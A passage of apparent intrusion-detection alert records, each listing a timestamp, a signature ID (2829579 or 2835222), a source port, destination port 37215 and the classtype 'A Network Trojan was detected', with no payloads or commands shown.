          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289426
          SID:2829579
          Source Port:38436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865982
          SID:2829579
          Source Port:59956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028229
          SID:2835222
          Source Port:38392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167725
          SID:2835222
          Source Port:42308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914396
          SID:2835222
          Source Port:37276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952329
          SID:2835222
          Source Port:52292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290240
          SID:2829579
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132516
          SID:2829579
          Source Port:60078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033909
          SID:2835222
          Source Port:42160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644465
          SID:2835222
          Source Port:33012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719564
          SID:2829579
          Source Port:57684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466150
          SID:2835222
          Source Port:35768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902357
          SID:2835222
          Source Port:42644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103084
          SID:2835222
          Source Port:52576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930217
          SID:2829579
          Source Port:48630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283712
          SID:2829579
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163101
          SID:2829579
          Source Port:44480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947416
          SID:2829579
          Source Port:57884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274377
          SID:2835222
          Source Port:54424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915872
          SID:2829579
          Source Port:54390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289827
          SID:2829579
          Source Port:53800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398010
          SID:2835222
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165374
          SID:2829579
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159274
          SID:2835222
          Source Port:48988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165971
          SID:2829579
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272923
          SID:2829579
          Source Port:54818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269977
          SID:2835222
          Source Port:41024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284270
          SID:2835222
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595122
          SID:2829579
          Source Port:52726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692120
          SID:2829579
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162875
          SID:2835222
          Source Port:32794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077186
          SID:2829579
          Source Port:59998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269233
          SID:2835222
          Source Port:34616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399230
          SID:2835222
          Source Port:59166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287931
          SID:2835222
          Source Port:60520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947358
          SID:2829579
          Source Port:53708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017410
          SID:2835222
          Source Port:52604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397691
          SID:2829579
          Source Port:59582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721137
          SID:2835222
          Source Port:48222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418087
          SID:2835222
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947375
          SID:2829579
          Source Port:56308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.091222
          SID:2835222
          Source Port:54006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289176
          SID:2835222
          Source Port:56530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539852
          SID:2835222
          Source Port:35424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418832
          SID:2835222
          Source Port:34870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472081
          SID:2835222
          Source Port:33472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539491
          SID:2829579
          Source Port:41656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028809
          SID:2835222
          Source Port:34638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163509
          SID:2835222
          Source Port:56734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102227
          SID:2835222
          Source Port:55072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947393
          SID:2835222
          Source Port:60296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165923
          SID:2835222
          Source Port:41826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169284
          SID:2835222
          Source Port:54424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718070
          SID:2835222
          Source Port:49836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.633845
          SID:2829579
          Source Port:53286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302519
          SID:2835222
          Source Port:55228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067272
          SID:2835222
          Source Port:45382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537789
          SID:2829579
          Source Port:42722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418205
          SID:2829579
          Source Port:44492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267453
          SID:2835222
          Source Port:40656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478139
          SID:2835222
          Source Port:32908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223657
          SID:2829579
          Source Port:41890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082810
          SID:2835222
          Source Port:49952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863871
          SID:2829579
          Source Port:37200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132960
          SID:2835222
          Source Port:40862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415879
          SID:2829579
          Source Port:33852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080459
          SID:2829579
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946331
          SID:2829579
          Source Port:35184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245906
          SID:2829579
          Source Port:34320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159593
          SID:2829579
          Source Port:42212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930245
          SID:2829579
          Source Port:39434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987419
          SID:2829579
          Source Port:38686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645597
          SID:2829579
          Source Port:58002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286124
          SID:2835222
          Source Port:45478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287398
          SID:2829579
          Source Port:50560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227138
          SID:2835222
          Source Port:56442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272329
          SID:2829579
          Source Port:49584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082730
          SID:2835222
          Source Port:32930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471705
          SID:2829579
          Source Port:44082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596130
          SID:2835222
          Source Port:39026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244931
          SID:2835222
          Source Port:46124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945396
          SID:2835222
          Source Port:36008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869890
          SID:2835222
          Source Port:51058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312696
          SID:2829579
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719649
          SID:2835222
          Source Port:33786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418214
          SID:2829579
          Source Port:50022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417531
          SID:2835222
          Source Port:42202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468079
          SID:2829579
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302497
          SID:2835222
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076973
          SID:2835222
          Source Port:59766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714798
          SID:2835222
          Source Port:58756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930017
          SID:2835222
          Source Port:45204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226857
          SID:2835222
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419286
          SID:2835222
          Source Port:53278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297819
          SID:2829579
          Source Port:37414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080994
          SID:2829579
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995695
          SID:2835222
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646146
          SID:2835222
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988492
          SID:2829579
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102565
          SID:2835222
          Source Port:36106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985432
          SID:2829579
          Source Port:50188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298003
          SID:2835222
          Source Port:44846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008042
          SID:2835222
          Source Port:58194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869970
          SID:2835222
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822771
          SID:2835222
          Source Port:39036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986329
          SID:2829579
          Source Port:34778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603579
          SID:2829579
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395956
          SID:2829579
          Source Port:37012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.314007
          SID:2835222
          Source Port:59946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078793
          SID:2835222
          Source Port:37954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286001
          SID:2829579
          Source Port:35372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469420
          SID:2835222
          Source Port:40484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478688
          SID:2835222
          Source Port:56456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396871
          SID:2835222
          Source Port:54146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490266
          SID:2829579
          Source Port:35960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206805
          SID:2829579
          Source Port:40990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719344
          SID:2829579
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129738
          SID:2829579
          Source Port:38168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604541
          SID:2835222
          Source Port:54618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298984
          SID:2829579
          Source Port:44898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085380
          SID:2829579
          Source Port:52036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035542
          SID:2829579
          Source Port:35184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908887
          SID:2829579
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398331
          SID:2835222
          Source Port:50236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418910
          SID:2835222
          Source Port:35680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559102
          SID:2829579
          Source Port:53436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864364
          SID:2829579
          Source Port:38596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227422
          SID:2835222
          Source Port:59558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288456
          SID:2829579
          Source Port:46214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397482
          SID:2835222
          Source Port:60504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207824
          SID:2829579
          Source Port:46944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538506
          SID:2829579
          Source Port:45068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103307
          SID:2835222
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291749
          SID:2829579
          Source Port:40660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724104
          SID:2835222
          Source Port:53296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469667
          SID:2835222
          Source Port:45466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034009
          SID:2829579
          Source Port:47278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285093
          SID:2829579
          Source Port:58290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223017
          SID:2829579
          Source Port:36310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602681
          SID:2829579
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604640
          SID:2835222
          Source Port:43972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252951
          SID:2835222
          Source Port:45444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030419
          SID:2835222
          Source Port:40430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951899
          SID:2835222
          Source Port:34208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.633966
          SID:2835222
          Source Port:60246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039559
          SID:2829579
          Source Port:37950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653034
          SID:2829579
          Source Port:44592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820271
          SID:2835222
          Source Port:53460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920164
          SID:2829579
          Source Port:40692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417553
          SID:2835222
          Source Port:50604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600324
          SID:2829579
          Source Port:56674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206128
          SID:2829579
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860637
          SID:2829579
          Source Port:39034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539060
          SID:2835222
          Source Port:53228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.125330
          SID:2829579
          Source Port:51748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471468
          SID:2829579
          Source Port:40806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469495
          SID:2829579
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559086
          SID:2835222
          Source Port:45468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870543
          SID:2835222
          Source Port:49274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667922
          SID:2829579
          Source Port:39604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163697
          SID:2835222
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288219
          SID:2835222
          Source Port:44072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163801
          SID:2829579
          Source Port:50350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465040
          SID:2829579
          Source Port:48942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.043108
          SID:2829579
          Source Port:35650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076592
          SID:2829579
          Source Port:57590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299140
          SID:2829579
          Source Port:37912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604619
          SID:2835222
          Source Port:55728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862049
          SID:2835222
          Source Port:46888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818356
          SID:2835222
          Source Port:43890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286844
          SID:2835222
          Source Port:47620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539266
          SID:2829579
          Source Port:35272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565137
          SID:2829579
          Source Port:60008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.886943
          SID:2829579
          Source Port:36714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557992
          SID:2829579
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415453
          SID:2829579
          Source Port:43844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.644736
          SID:2829579
          Source Port:48548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169319
          SID:2829579
          Source Port:36512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718374
          SID:2835222
          Source Port:57266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399444
          SID:2835222
          Source Port:43118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282536
          SID:2829579
          Source Port:59902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567556
          SID:2829579
          Source Port:52762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947175
          SID:2829579
          Source Port:51710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718859
          SID:2829579
          Source Port:46186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399370
          SID:2829579
          Source Port:35624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157080
          SID:2829579
          Source Port:45942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562217
          SID:2835222
          Source Port:55746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076335
          SID:2835222
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646112
          SID:2835222
          Source Port:45420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267478
          SID:2829579
          Source Port:52824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863693
          SID:2829579
          Source Port:36292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205898
          SID:2829579
          Source Port:38578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163463
          SID:2835222
          Source Port:49964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716018
          SID:2835222
          Source Port:41652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129123
          SID:2829579
          Source Port:60706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721287
          SID:2835222
          Source Port:45492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643602
          SID:2835222
          Source Port:53170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
